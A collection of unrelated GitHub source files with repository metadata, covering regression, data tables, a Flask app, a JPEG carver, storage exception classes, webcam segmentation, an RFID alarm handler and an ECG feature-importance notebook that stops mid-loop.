analyzers/analyseSafran.py
|
analyseSafran.py
|
py
| 4,231
|
python
|
fr
|
code
| 0
|
github-code
|
6
|
38466019670
|
__author__ = 'christiaanleysen'
import features.featureMaker as fm
from sklearn.metrics import mean_absolute_error
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn import preprocessing
'''
This file is used to calculate the linear regression
'''
def predictConsumption(trainSetX, trainSetY, testSetX, testSetY,tune_params=True,scaled=False):
"""
predicts the consumption
Parameters:
-----------
trainSetX: training feature set
trainSetY: training value set
testSetX: test feature set
testSetY: test value set
Returns:
--------
a prediction of the consumption
"""
if scaled:
trainSetX = np.asarray([preprocessing.scale(element)for element in trainSetX])
#trainSetY =preprocessing.scale(trainSetY,axis=0)
testSetX = np.asarray([preprocessing.scale(element )for element in testSetX])
#testSetY =preprocessing.scale(testSetY,axis=0)
OLS = LinearRegression()
OLS.fit(trainSetX,trainSetY)# fit default model (mean zero & rbf kernel) with data
predictedSetY = OLS.predict(testSetX)
MAE = mean_absolute_error(testSetY,predictedSetY)
if np.mean(np.mean(testSetY)) == 0:
MRE = 50
else:
MRE = (MAE/(np.mean(testSetY)))*100
return predictedSetY,testSetY,MAE,MRE
|
chrike-platinum/Thesis-Gaussian-process-regression-clustering-and-prediction-of-energy-consumption
|
Methods/LinRegPrediction.py
|
LinRegPrediction.py
|
py
| 1,353
|
python
|
en
|
code
| 1
|
github-code
|
6
|
23135628898
|
# Make Table 4: Snowdrift Type Census Zonal Statistics
import pandas as pd
df = pd.read_csv('drift_zonal_statistics_mean_over_time.csv', index_col=False)
del df['Median Drift Depth [m]']
df.replace('watertrack', 'water track (f)', inplace=True)
df.replace('polygon', 'ice wedge (f)', inplace=True)
df.replace('stream', 'stream (nf)', inplace=True)
df.replace('lake', 'lake (nf)', inplace=True)
df.replace('outcrop', 'outcrop (nf)', inplace=True)
df['Drift Area [m^2]'] = df['Drift Area [m^2]'].astype(int)
df['Mean Drift Volume [m^3]'] = df['Mean Drift Volume [m^3]'].astype(int)
df.columns = ['Class','Swath','Drift Area (m<sup>2</sup>)', 'Mean Drift Depth (m)', 'Drift Volume (m<sup>3</sup>)',
'Std. Depth (m)', 'CV Depth', 'NDV (m)']
df2 = df.groupby(['Swath','Class']).mean().reset_index()
df2['Drift Area (m<sup>2</sup>)'] = df2['Drift Area (m<sup>2</sup>)'].astype(int)
df2['Drift Volume (m<sup>3</sup>)'] = df2['Drift Volume (m<sup>3</sup>)'].astype(int)
df2.set_index('Swath', inplace=True)
df2 = df2.sort_values('Class')
df2 = df2.round(2)
hv_outcrop = pd.Series(['outcrop (nf)', 'N/A', 'N/A', 'N/A', 'N/A', 'N/A', 'N/A',], name='HV', index=df2.columns)
df2 = df2.append(hv_outcrop)
df2 = df2.sort_values('Class')
print(df2.to_markdown())
|
charparr/arctic-snowdrifts
|
snowdrift_type_census/results/make_table_4.py
|
make_table_4.py
|
py
| 1,271
|
python
|
en
|
code
| 0
|
github-code
|
6
|
27267969236
|
from flask import Flask, render_template
from shp_display import *
app = Flask(__name__)
def script():
return ['hades2']
def get_table(db):
db = db
script = "<table>"
# Header Generator
code = "<tr>"
for s in db:
if str(s) != "MULTIPOLYGON" and str(s) != 'geometry':
code = code + "<th>" + str(s) + "</th>"
script = script + code
# Data Generator
for i in range(len(db.index)):
code = "<tr>"
for item in list(db.loc[i]):
if not str(item).startswith("MULTIPOLYGON") and not str(item).startswith("POLYGON "):
code = code + "<td>" + str(item) + "</td>"
code = code + "</tr>"
script = script + code
script = script + "</table>"
return script
@app.route('/')
def index():
value = script()
return render_template('index.html',
entry1=value[0],
path_to_image=some[0],
lis=some[1].shape,
table_n=get_table(some[1])
)
@app.route('/up_pop')
def up_pop():
some = get_file()
return render_template('up_population.html',
table_n=get_table(some[1]),
path_to_image=some[0])
if __name__ == "__main__":
app.run(debug=True, host='10.68.69.29')
|
nitish8090/Watershed_Modules_Py3
|
flask_app/app.py
|
app.py
|
py
| 1,373
|
python
|
en
|
code
| 0
|
github-code
|
6
|
37964221731
|
import sys
import os
import random
from PIL import Image
'''
Simple image carver. Right now it will assemble any and all JPEGS found including partial fragmented files. It does not find the rest of the file.
You must have pillow installed. You can do that by `pip install pillow`.
YOU MUST HAVE PYTHON 3 NOT 2! THE Pillow version used is the python version 3 and I can't guarantee any of this works on python 2.
'''
def main():
if len(sys.argv) < 2:
print("Invalid input, you must specify a file as the first argument.")
exit(0)
readFile(sys.argv[1])
# Reads file and creates the list of SOI AND EOI markers
def readFile(filename):
startMarkerArr = []
endMarkerArr = []
sosArr = []
counter = 0
fileSize = os.stat(filename).st_size
file = open(filename, 'rb')
fileBuffer = bytearray(file.read())
while counter < fileSize:
byte1 = bytes([fileBuffer[counter]])
byte2 = bytes([fileBuffer[counter+1]])
if findStart(byte1, byte2):
startMarkerArr.append(counter)
if findEnd(byte1, byte2):
endMarkerArr.append(counter)
counter += 2
print("Found markers")
pairs = findPairs(startMarkerArr, endMarkerArr, sosArr)
validCount = buildFile(pairs)
#Finds SOI
def findStart(byte1, byte2):
if byte1 == b'\xFF' and byte2 == b'\xD8':
return True
return False
#Finds EOI
def findEnd(byte1, byte2):
if byte1 == b'\xFF' and byte2 == b'\xD9':
return True
return False
#Creates the pairs of SOI and EOI markers
def findPairs(startMarkerArr, endMarkerArr, sosArr):
markerPairs = []
for startI in range(0, len(startMarkerArr)):
for endI in range(0, len(endMarkerArr)):
if startMarkerArr[startI] < endMarkerArr[endI] + 2:
markerPairs.append((startMarkerArr[startI], endMarkerArr[endI]))
print("Found pairs list size is " + str(len(markerPairs)))
return markerPairs
#Tests all pairs and tests/ deletes invalid images using Pillow/ PIL
# Also tests to see if the discovered file is the smallest of the ones generated from the same SOI
def buildFile(markerPairs):
file = open(sys.argv[1], 'rb')
byteBuffer = file.read()
counter = 0
smallestHashMap = {}
while counter < len(markerPairs):
jpegBytes = bytearray()
start = markerPairs[counter][1]
jpegBytes.extend(byteBuffer[markerPairs[counter][0]:markerPairs[counter][1]+2])
name = str(random.random())
jpegFile = open(name + ".jpg", 'wb+')
jpegFile.write(jpegBytes)
try:
Image.open(name + ".jpg")
except IOError:
os.remove(name + ".jpg")
print("Invalid image removed")
else:
if smallestHashMap.get(markerPairs[counter][0]) != None:
print(len(jpegBytes), smallestHashMap[markerPairs[counter][0]][0])
if counter != 0 and smallestHashMap.get(markerPairs[counter][0]) != None and len(jpegBytes) < smallestHashMap[markerPairs[counter][0]][0]:
print("Smaller image found, duplicate removed!")
os.remove(smallestHashMap[markerPairs[counter][0]][1])
smallestHashMap[markerPairs[counter][0]] = (len(jpegBytes), name + ".jpg")
if smallestHashMap.get(markerPairs[counter][0]) != None and len(jpegBytes) > smallestHashMap[markerPairs[counter][0]][0]:
os.remove(name + ".jpg")
print("Original is the smallest duplicate removed")
if smallestHashMap.get(markerPairs[counter][0]) == None:
smallestHashMap[markerPairs[counter][0]] = (len(jpegBytes), name + ".jpg")
print("One valid image has been added or replaced")
counter += 1
# No idea what this does
if __name__ == '__main__':
main()
|
steviekong/Jpeg_carver
|
carver.py
|
carver.py
|
py
| 3,434
|
python
|
en
|
code
| 1
|
github-code
|
6
|
26247964346
|
import six
import webob.exc
from oslo_log import log
from delfin.i18n import _
LOG = log.getLogger(__name__)
class ConvertedException(webob.exc.WSGIHTTPException):
def __init__(self, exception):
self.code = exception.code
self.title = ''
self.explanation = exception.msg
self.error_code = exception.error_code
self.error_args = exception.error_args
super(ConvertedException, self).__init__()
class DelfinException(Exception):
"""Base Delfin Exception
To correctly use this class, inherit from it and define
a 'msg_fmt' property. That msg_fmt will get printf'd
with the tuple arguments provided to the constructor.
"""
msg_fmt = _("An unknown exception occurred.")
code = 500
def __init__(self, *args, **kwargs):
self.error_args = args
message = kwargs.get('message')
try:
if not message:
message = self.msg_fmt.format(*args)
else:
message = six.text_type(message)
except Exception:
LOG.error("Failed to format message: {0}".format(args))
message = self.msg_fmt
self.msg = message
super(DelfinException, self).__init__(message)
@property
def error_code(self):
return self.__class__.__name__
class NotAuthorized(DelfinException):
msg_fmt = _("Not authorized.")
code = 403
class Invalid(DelfinException):
msg_fmt = _("Unacceptable parameters.")
code = 400
class BadRequest(Invalid):
msg_fmt = _('The server could not comply with the request since\r\n'
'it is either malformed or otherwise incorrect.\r\n')
code = 400
class MalformedRequestBody(Invalid):
msg_fmt = _("Malformed request body: {0}.")
class MalformedRequestUrl(Invalid):
msg_fmt = _("Malformed request url.")
class InvalidCredential(Invalid):
msg_fmt = _("The credentials are invalid.")
class InvalidResults(Invalid):
msg_fmt = _("The results are invalid. {0}")
class InvalidInput(Invalid):
msg_fmt = _("Invalid input received. {0}")
class InvalidName(Invalid):
msg_fmt = _("An invalid 'name' value was provided. {0}")
class InvalidContentType(Invalid):
msg_fmt = _("Invalid content type: {0}.")
class StorageSerialNumberMismatch(Invalid):
msg_fmt = _("Storage serial number mismatch. {0}")
class StorageAlreadyExists(Invalid):
msg_fmt = _("Storage already exists.")
class InvalidSNMPConfig(Invalid):
msg_fmt = _("Invalid SNMP configuration: {0}")
class NotFound(DelfinException):
msg_fmt = _("Resource could not be found.")
code = 404
class NoSuchAction(NotFound):
msg_fmt = _("There is no such action: {0}")
class AccessInfoNotFound(NotFound):
msg_fmt = _("Access information for storage {0} could not be found.")
class AlertSourceNotFound(NotFound):
msg_fmt = _("Alert source for storage {0} could not be found.")
class AlertSourceNotFoundWithHost(NotFound):
msg_fmt = _("Alert source could not be found with host {0}.")
class SNMPConnectionFailed(BadRequest):
msg_fmt = _("Connection to SNMP server failed: {0}")
class StorageNotFound(NotFound):
msg_fmt = _("Storage {0} could not be found.")
class StorageBackendNotFound(NotFound):
msg_fmt = _("Storage backend could not be found.")
class StoragePoolNotFound(NotFound):
msg_fmt = _("Storage pool {0} could not be found.")
class VolumeNotFound(NotFound):
msg_fmt = _("Volume {0} could not be found.")
class StorageHostInitiatorNotFound(NotFound):
msg_fmt = _("Storage host initiator {0} could not be found.")
class StorageHostNotFound(NotFound):
msg_fmt = _("Storage host {0} could not be found.")
class StorageHostGroupNotFound(NotFound):
msg_fmt = _("Storage host group {0} could not be found.")
class PortGroupNotFound(NotFound):
msg_fmt = _("Port group {0} could not be found.")
class VolumeGroupNotFound(NotFound):
msg_fmt = _("Volume group {0} could not be found.")
class MaskingViewNotFound(NotFound):
msg_fmt = _("Masking View {0} could not be found.")
class StorageHostGrpHostRelNotFound(NotFound):
msg_fmt = _("Storage Host Group Host Relation {0} could not be found.")
class PortGrpPortRelNotFound(NotFound):
msg_fmt = _("Port Group Port Relation {0} could not be found.")
class VolGrpVolRelationNotFound(NotFound):
msg_fmt = _("Volume Group Volume Relation {0} could not be found.")
class ControllerNotFound(NotFound):
msg_fmt = _("Controller {0} could not be found.")
class ControllerListNotFound(NotFound):
msg_fmt = _("Controller List for {0} could not be found.")
class PortNotFound(NotFound):
msg_fmt = _("Port {0} could not be found.")
class PortListNotFound(NotFound):
msg_fmt = _("Port List for {0} could not be found.")
class DiskNotFound(NotFound):
msg_fmt = _("Disk {0} could not be found.")
class FilesystemNotFound(NotFound):
msg_fmt = _("Filesystem {0} could not be found.")
class QtreeNotFound(NotFound):
msg_fmt = _("Qtree {0} could not be found.")
class QuotaNotFound(NotFound):
msg_fmt = _("Quota {0} could not be found.")
class ShareNotFound(NotFound):
msg_fmt = _("Share {0} could not be found.")
class StorageDriverNotFound(NotFound):
msg_fmt = _("Storage driver '{0}'could not be found.")
class TaskNotFound(NotFound):
msg_fmt = _("Task {0} could not be found.")
class FailedTaskNotFound(NotFound):
msg_fmt = _("Failed task {0} could not be found.")
class ConfigNotFound(NotFound):
msg_fmt = _("Could not find config at {0}.")
class PasteAppNotFound(NotFound):
msg_fmt = _("Could not load paste app '{0}' from {1}.")
class StorageBackendException(DelfinException):
msg_fmt = _("Exception from Storage Backend: {0}.")
class SSHException(DelfinException):
msg_fmt = _("Exception in SSH protocol negotiation or logic. {0}")
class SSHInjectionThreat(DelfinException):
msg_fmt = _("SSH command injection detected: {0}.")
# Tooz locking
class LockCreationFailed(DelfinException):
msg_fmt = _('Unable to create lock. Coordination backend not started.')
class LockAcquisitionFailed(DelfinException):
msg_fmt = _('Lock acquisition failed.')
class DuplicateExtension(DelfinException):
msg_fmt = _('Found duplicate extension: {0}.')
class ImproperIPVersion(DelfinException):
msg_fmt = _("Provided improper IP version {0}.")
class ConnectTimeout(DelfinException):
msg_fmt = _("Connect timeout.")
code = 500
class InvalidUsernameOrPassword(DelfinException):
msg_fmt = _("Invalid username or password.")
code = 400
class BadResponse(Invalid):
msg_fmt = _('Bad response from server')
code = 500
class InvalidPrivateKey(DelfinException):
msg_fmt = _("not a valid RSA private key.")
code = 400
class SSHConnectTimeout(DelfinException):
msg_fmt = _("SSH connect timeout.")
code = 500
class SSHNotFoundKnownHosts(NotFound):
msg_fmt = _("{0} not found in known_hosts.")
code = 400
class StorageClearAlertFailed(DelfinException):
msg_fmt = _("Failed to clear alert. Reason: {0}.")
class StorageListAlertFailed(DelfinException):
msg_fmt = _("Failed to list alerts. Reason: {0}.")
class HTTPConnectionTimeout(DelfinException):
msg_fmt = _("HTTP connection timeout: {0}.")
class InvalidCAPath(DelfinException):
msg_fmt = _("Invalid CA path: {0}.")
class StoragePerformanceCollectionFailed(DelfinException):
msg_fmt = _("Failed to collect performance metrics. Reason: {0}.")
class SSLCertificateFailed(Invalid):
msg_fmt = _("SSL Certificate Failed.")
code = 400
class SSLHandshakeFailed(Invalid):
msg_fmt = _("SSL handshake failure.")
class StorageIsSyncing(Invalid):
msg_fmt = _("Storage {0} is syncing now, please try again later.")
class InvalidIpOrPort(DelfinException):
msg_fmt = _("Invalid ip or port.")
code = 400
class InvalidStorageCapability(Invalid):
msg_fmt = _("Invalid capability response: {0}")
code = 500
class StorageCapabilityNotSupported(Invalid):
msg_fmt = _("Capability feature not supported by storage")
code = 501
class EmptyResourceMetrics(DelfinException):
msg_fmt = _("Empty resource metric in capabilities")
code = 501
class TelemetryTaskExecError(DelfinException):
msg_fmt = _("Failure in telemetry task execution")
class ComponentNotFound(NotFound):
msg_fmt = _("Component {0} could not be found.")
class IncompleteTrapInformation(DelfinException):
msg_fmt = _("Incomplete trap information."
"Storage {0} alert information needs to be synchronized.")
class StorageMaxUserCountException(DelfinException):
msg_fmt = _(
"Exception from storage of users has reached the upper limit: {0}.")
|
sodafoundation/delfin
|
delfin/exception.py
|
exception.py
|
py
| 8,827
|
python
|
en
|
code
| 201
|
github-code
|
6
|
16543442339
|
# RE_DATA names
DATA_BLOCK = "Data"
ACTION = "Action"
STAGE = "Stage"
STATIONFROM = "StationFrom"
STATIONFROMCODE = "StationFromCode"
STATIONTO = "StationTo"
STATIONTOCODE = "StationToCode"
DEPARTDATE = "DepDate"
DEPARTTIME = "DepTime"
BADDATE = "BadDate"
BADTIME = "BadTime"
ARRTIME = "ArrTime"
STATIONAT = "StationAt"
STATIONATTIME = "StationAtTime"
SINGLERETURN = "SingleReturn"
RETURNDATE = "ReturnDate"
RETURNTIME = "ReturnTime"
RESPONSE_HEAD = "Response"
RESPONSE_CODE = "Code"
RESPONSE_DATA = "ResponseData"
CONFIRMED = "Confirmed"
QUESTION = "Question"
ACTUALDEPART = "ActualDepart"
QUESTIONSEARCHING = "QSEARCHING"
QUESTIONTREE = "QUESTIONTREE"
STATUS_EXIT = 999
STATUS_INVALID = "Status Invalid"
FORMAT_DATE = '%d/%m/%Y'
FORMAT_TIME = '%H:%M'
FORMAT_DATETIME = FORMAT_DATE + ' ' + FORMAT_TIME
|
Grimmii/TrainChatBot
|
src/ai_chatbot/scripts/REDataHeader.py
|
REDataHeader.py
|
py
| 806
|
python
|
en
|
code
| 0
|
github-code
|
6
|
1601092211
|
__author__ = "Meet Dave"
__version__ = "1.0"
__maintainer__ = "Meet Dave"
__email__ = "meetkirankum@umass.edu"
# Load libraries
import matplotlib.pyplot as plt
import torch
import cv2
import numpy as np
from torchvision import models
from torchvision import transforms
from make_video import make_video
# Load pretrained model
deeplapv3_101 = models.segmentation.deeplabv3_resnet101(pretrained=True).eval()
# Load background image
background_path = "../images/books-seats.png"
background = cv2.imread(background_path)
background = cv2.cvtColor(background, cv2.COLOR_BGR2RGB)
video_path = "../images/test1.avi"
# Webcam stream
cap = cv2.VideoCapture(0)
ret, img = cap.read()
height = img.shape[0]
width = img.shape[1]
video_download = make_video(video_path,width,height)
background = cv2.resize(background, (width,height))
background = background.astype(float)
# Preprocess class
preprocess = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize((256,256)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
while(True):
ret, img = cap.read()
if ret:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# Preprocess image
input_img = preprocess(img)
# Creating a batch dimension
input_batch = input_img.unsqueeze(0)
# Inference
output = deeplapv3_101(input_batch)['out'][0]
final_output = output.argmax(dim=0)
# Just keep person class and make everything else background
person_output = torch.zeros_like(final_output)
person_output[final_output == 15] = 1
img_resize = cv2.resize(img,(256,256))
# Get person segmentation
foreground = img_resize * person_output.numpy()[:,:,None]
foreground = foreground.astype(float)
foreground_orig_size = cv2.resize(foreground,(width,height))
# Create alpha mask for blending
th, alpha = cv2.threshold(foreground_orig_size,0,255, cv2.THRESH_BINARY)
# Smooth the edges for smooth blending
alpha = (cv2.GaussianBlur(alpha, (7,7),0))/255
final = foreground_orig_size * alpha + background * (1 - alpha)
final = final[...,::-1]
final = (final).astype(np.uint8)
cv2.imshow('frame',final)
video_download.write(final)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
meetdave06/random-cv-tasks
|
test1/test1.py
|
test1.py
|
py
| 2,455
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73727669948
|
import torch
def get_device(model=None):
"""Returns two-tuple containing a PyTorch device (CPU or GPU(s)), and number of available GPUs.
Returns a two-tuple containing a PyTorch device (CPU or GPU(s)) and number of available CUDA
devices. If `model` is not None, and a CUDA device is available, the model is placed on the
CUDA device with `model.to(device)`. If multiple GPUs are available, the model is parallized
with `torch.nn.DataParallel(model)`.
Args:
(Torch.nn.Module) PyTorch model, if CUDA device is available this function will place the
model on the CUDA device with `model.to(device)`. If multiple CUDA devices are available,
the model is parallized with `torch.nn.DataParallel(model)`.
Returns:
A two-tuple containing a PyTorch device (CPU or GPU(s)), and number of available GPUs.
"""
n_gpu = 0
# use a GPU if available
if torch.cuda.is_available():
device = torch.device("cuda")
n_gpu = torch.cuda.device_count()
# if model is provided, we place it on the GPU and parallize it (if possible)
if model:
model.to(device)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
model_names = ', '.join([torch.cuda.get_device_name(i) for i in range(n_gpu)])
print('Using CUDA device(s) with name(s): {}.'.format(model_names))
else:
device = torch.device("cpu")
print('No GPU available. Using CPU.')
return device, n_gpu
def preprocess_query(query):
"""Preprocesses `query` to look more like natural language.
Preprocess `query` to look more like natural language by puntuating it with a question mark and
rearanging into a subject-verb-object (SVO) topology.
Args:
query (str): Query from Wiki- or Medhop.
Returns:
`query`, punctuated by a question mark and re-arranged into an SVO topology.
"""
return ' '.join(query.split(' ')[1:] + query.split(' ')[0].split('_')).replace('?', '') + '?'
|
bowang-lab/Transformer-GCN-QA
|
src/utils/model_utils.py
|
model_utils.py
|
py
| 2,040
|
python
|
en
|
code
| 15
|
github-code
|
6
|
24199424367
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 15:22:37 2019
@author: Administrator
"""
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
import test_module
from queue import PriorityQueue
class Node:
def __init__(self, priority, node):
self.priority = priority
self.node = node
def __lt__(self, other):
return self.priority < other.priority
class Solution:
def mergeKLists(self, lists):
pq = PriorityQueue()
for _list in lists:
if _list:
pq.put(Node(_list.val, _list))
dummy_head = ListNode(0)
cur = dummy_head
while pq.qsize() != 0:
min_node = pq.get()
cur.next = min_node.node
cur = cur.next
if min_node.node.next:
pq.put(Node(min_node.node.next.val, min_node.node.next))
return dummy_head.next
if __name__ == '__main__':
arrs = [[1,4,5],[1,3,4],[2,6]]
heads = []
for arr in arrs:
heads.append(test_module.create_list_node(arr, len(arr)))
for head in heads:
test_module.print_linked_list(head)
res = Solution().mergeKLists(heads)
test_module.print_linked_list(res)
|
AiZhanghan/Leetcode
|
code/23. Merge k Sorted Lists.py
|
23. Merge k Sorted Lists.py
|
py
| 1,325
|
python
|
en
|
code
| 0
|
github-code
|
6
|
18821603273
|
import os
def rename_files():
# 1 get file names from a folder
# r stands for raw path
file_list = os.listdir(r"D:\workspace\Udacity\Course 1\Lesson 1\Prank")
print(file_list)
os.chdir(r"D:\workspace\Udacity\Course 1\Lesson 1\Prank")
# 2 for each file, rename file
for file_name in file_list:
os.rename("athensssss.jpg", "austin.jpg")
print("New file name: " + file_name)
rename_files()
|
joshuar500/full-stack-nano
|
Course 1/Lesson 1/rename_files.py
|
rename_files.py
|
py
| 438
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73675801466
|
import os, sys
proj_path = "/home/webuser/webapps/tigaserver/"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tigaserver_project.settings")
sys.path.append(proj_path)
os.chdir(proj_path + "util_scripts/")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
from django.db.models import Count
from tigaserver_app.models import EuropeCountry, Report, ExpertReportAnnotation, Categories
current_progress = Report.objects.exclude(creation_time__year=2014).exclude(note__icontains="#345").exclude(hide=True).exclude(photos=None).filter(type='adult').annotate(n_annotations=Count('expert_report_annotations')).filter(n_annotations__lt=3).exclude(n_annotations=0).order_by('-server_upload_time')
reports_filtered = filter(lambda x: not x.deleted and x.latest_version, current_progress)
for c in current_progress:
country = 'None'
if c.country is not None:
country = c.country.name_engl
print("Report in progress {0} - country {1} - date {2}".format(c.version_UUID, country, c.server_upload_time ))
assigned_to = ExpertReportAnnotation.objects.filter(report=c)
for a in assigned_to:
print("\t - assigned to {0} from country , regional manager , country has regional manager ".format( a.user.username ))
|
Mosquito-Alert/mosquito_alert
|
util_scripts/check_in_progress_reports.py
|
check_in_progress_reports.py
|
py
| 1,276
|
python
|
en
|
code
| 6
|
github-code
|
6
|
39380382951
|
import datetime
import jpholiday
from django import template
register = template.Library() # Djangoใฎใใณใใฌใผใใฟใฐใฉใคใใฉใช
# ใซในใฟใ ใใฃใซใฟใจใใฆ็ป้ฒใใ
@register.filter
def get_dict_value(dictionary, key):
return dictionary.get(key)
@register.filter
def append_string(dest, src):
return dest + src
@register.filter
def get_day_class(date):
day_class = ''
# dateใฏๅนด/ๆ/ๆฅๅฝขๅผใฎๆๅญๅ
#d = datetime.strptime(date,'%Y/%m/%d')
# strptimeใไฝฟ็จใใใจใis_holidayใๆญฃใใๅไฝใใชใใใใฎใฏใผใฏใขใฉใฆใณใ
# datetime.date(2020,7,23,0,0)ใซใชใใฎใๅๅ ๏ผ
sp = date.split('/')
day = datetime.date(int(sp[0]), int(sp[1]), int(sp[2]))
if day.weekday() == 5:
# ๅๆๆฅ
day_class = 'text-primary'
elif day.weekday() == 6 or jpholiday.is_holiday(day):
# ๆฅๆ or ็ฅๆฅ
day_class = 'text-danger'
return day_class
@register.filter
def get_monthly_max(monthly_list):
max_count = 0
for date, count in monthly_list:
max_count = max(max_count, count)
return max_count
|
manakamu/docker
|
django/Docker-Django/django_project/pole/templatetags/pole_tags.py
|
pole_tags.py
|
py
| 1,141
|
python
|
ja
|
code
| 0
|
github-code
|
6
|
39463837440
|
# Standard library imports
import serial
import time
import sys
import zerorpc
import datetime
# Application library imports
from MySQLhandler import *
import Utility
SCRIPT_NAME = "RFIDhandler"
TIME_BEFORE_ACTIVATION = 60 * 5
print("Initialize serial connection with Arduino")
try:
s = serial.Serial('/dev/ttyACM0', 9600)
except:
error_msg = "Unable to connect to the Arduino"
print(error_msg)
Utility.launch_fatal_process_alert(SCRIPT_NAME, error_msg)
time.sleep(50000) # Wait a moment for a possible fix
sys.exit() # Close the process and hope for a restart (-> supervisor)
# Each variables store an object capable of inserting, updating and deleting
# in the given t
timeshot = 0
while True:
line = s.readline() # Get the line sent by the Arduino
try:
db_devices = MySQL('devices')
db_alarms = MySQL('alarms')
db_users = MySQL('users')
except:
error_msg = "Unable to connect to the database"
print(error_msg)
Utility.launch_fatal_process_alert(SCRIPT_NAME, error_msg)
time.sleep(50000)
sys.exit()
user = db_users.get('RFID', line.split('\r')[0])
# [user] represents the owner's row of the RFID tag passed
# if it exists
if user:
Utility.switch_led_info(0)
Utility.sound(0)
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
c.RFID()
alarms = db_alarms.all()
state = bool(alarms[0]['state'])
is_one_alarm_up = False
for alarm in alarms:
is_one_alarm_up = is_one_alarm_up or bool(alarm['state'])
if is_one_alarm_up and not state:
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', state)
elif not state:
print("[{}]: Waiting {} sec before activation".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S"), TIME_BEFORE_ACTIVATION))
time.sleep(TIME_BEFORE_ACTIVATION)
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', not state)
elif state:
print("[{}]: Deactivating".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S")))
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', not state)
else:
print("[{}]: Unauthorized tag".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S")))
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
c.RFIDError()
|
jeremyalbrecht/Alarm-RPI
|
RFIDhandler.py
|
RFIDhandler.py
|
py
| 2,490
|
python
|
en
|
code
| 0
|
github-code
|
6
|
43367818416
|
# Importancia de la caracterรญstica de permutaciรณn (PFI) para la clasificaciรณn de latidos utilizando un perceptrรณn multicapa (MLP)
#
#
# - Cรณdigo 'PFI.py'
# - Trabajo Fin de Mรกster.
# - Nรฉstor Bolaรฑos Bolaรฑos. (nestorbolanos@correo.ugr.es)
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import pickle
import glob
import matplotlib.pyplot as plt
import pandas as pd
from scipy import *
import os
import seaborn as sns
import tensorflow as tf
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn import *
from sklearn.metrics import *
from sklearn.model_selection import StratifiedKFold
sns.set()
# Cargamos los datos y codificamos las clases de cada latido mediante One Hot
# Cargamos los datos de entrenamiento y de test:
tamaรฑo = 277
valores_train = np.empty(shape=[0, tamaรฑo])
valores_test = np.empty(shape=[0, tamaรฑo])
latidos_entrenamiento = glob.glob('train_beats.csv')
latidos_test = glob.glob('test_beats.csv')
for j in latidos_entrenamiento:
filas = np.loadtxt(j, delimiter=',')
valores_train = np.append(valores_train, filas, axis=0)
for j in latidos_test:
filas = np.loadtxt(j, delimiter=',')
valores_test = np.append(valores_test, filas, axis=0)
print(valores_train.shape)
print(valores_test.shape)
# Separamos los datos de entrenamiento y de test, y aplicamos la codificaciรณn One Hot a Y:
X_train = valores_train[:,:-2]
X_test = valores_test[:,:-2]
y_train = valores_train[:,-2]
y_test = valores_test[:,-2]
# Combinamos todo nuevamente:
X = np.concatenate((X_train, X_test), axis = 0)
Y = np.concatenate((y_train, y_test), axis = 0)
# codificaciรณn One Hot de Y:
Y = to_categorical(Y)
# Construimos el perceptrรณn multicapa
# Construimos el modelo MLP
def getModel():
model_mlp = Sequential()
model_mlp.add(Dense(100, activation = 'relu'))
model_mlp.add(Dense(9, activation = 'softmax'))
return model_mlp
model_mlp.summary()
# Implementamos y aplicamos PFI para el perceptrรณn multicapa
# Mรฉtodos de perturbaciรณn:
# Hay diferentes tipos de perturbaciรณn para la importancia de la caracterรญstica de permutaciรณn, como la perturbaciรณn media, la perturbaciรณn cero y la perturbaciรณn aleatoria. En la implementaciรณn que hemos realizado en este cuaderno, los datos dentro de cada corte se han barajado aleatoriamente.
fig, ax = plt.subplots(1, 4, figsize = (20, 4), sharex = True, sharey=True)
# Sin perturbaciรณn: seรฑal original.
ax[0].set_title('Sin perturbaciรณn')
ax[0].plot(np.arange(len( X[20, :])), X[20, :])
# perturbaciรณn 0: se establecen los valores de cada corte a 0.
ax[1].set_title('Perturbaciรณn 0')
X_zero_perturbed = X[20, :].copy()
X_zero_perturbed[5 * 25 : 6 * 25] = 0.0
ax[1].plot(np.arange(len(X[20, :])), X_zero_perturbed)
# Perturbaciรณn aleatoria: los valores de cada corte se reemplazan con valores aleatorios.
ax[2].set_title('Perturbaciรณn aleatoria')
X_random_perturbed = X[20, :].copy()
X_random_perturbed[5 * 25 : 6 * 25] = np.std(X[20, :]) * np.random.randn(25) + np.mean(X[20, :])
ax[2].plot(np.arange(len(X[20, :])), X_random_perturbed)
# Perturbaciรณn media: se promedian los valores del corte actual.
ax[3].set_title('Perturbaciรณn Media')
X_mean_perturbed = X[20, :].copy()
X_mean_perturbed[5 * 25 : 6 * 25] = np.mean(X[20, 5 * 25 : 6 * 25])
ax[3].plot(np.arange(len(X[20, :])), X_mean_perturbed)
for i in range(4):
ax[i].set_xlabel('Tiempo')
ax[i].axvspan(5 * 25, 6 * 25, color = 'green', alpha = 0.25)
# Importancia de la caracterรญstica de permutaciรณn:
kf = StratifiedKFold(n_splits = 5, shuffle = True)
contador_pliegues = 0
M = np.zeros((X.shape[0], 11))
for indice_train, indice_test in kf.split(X, np.argmax(Y, axis = 1)):
print('Fold ', contador_pliegues)
# Separamos los datos en cada pliegue:
X_train, X_test = X[indice_train], X[indice_test]
y_train, y_test = Y[indice_train], Y[indice_test]
